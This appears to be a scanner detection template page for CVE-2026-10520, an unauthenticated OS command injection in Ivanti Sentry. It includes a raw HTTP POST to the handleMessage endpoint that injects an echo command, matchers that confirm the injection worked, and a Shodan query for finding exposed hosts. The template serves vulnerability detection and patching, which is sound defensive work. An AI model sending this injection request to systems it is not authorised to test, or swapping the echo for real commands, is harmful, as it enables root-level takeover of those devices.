Ivanti Sentry - OS Command Injection
CVE-2026-10520
Early Release
Description
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
Severity
Critical
Published Date
June 10, 2026
Template Author
dhiyaneshdk
CVE-2026-10520.yaml
id: CVE-2026-10520
info:
name: Ivanti Sentry - OS Command Injection
author: DhiyaneshDk
severity: critical
description: |
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
impact: |
Remote unauthenticated attackers can execute code as root, leading to full system compromise.
remediation: |
Upgrade to versions R10.5.2, R10.6.2, or R10.7.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-10520
- https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523/blob/main/README.md
metadata:
verified: true
max-request: 1
shodan-query: html:"Ivanti" html:"Sentry"
tags: cve,cve2026,ivanti,sentry,rce
http:
- raw:
- |
POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
message=execute%20system%20%2fconfiguration%2fsystem%2fcommandexec%20%3ccommandexec%3e%3cindex%3e1%3c%2findex%3e%3creqandres%3eecho%20CVE-2026-10520%3c%2freqandres%3e%3c%2fcommandexec%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Message handled successfully"
- "CVE-2026-10520"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100bfce1743b348bd595235be545c58e866cdaa9f9292a9fc196b31216d2c008c26022052536dcdfec52de9ec37317e99195beea2603e3bce7f50aa830b35b8508f66a3:922c64590222798bb761d5b6d8e72950Remediation Steps
Upgrade to versions R10.5.2, R10.6.2, or R10.7.1 or later.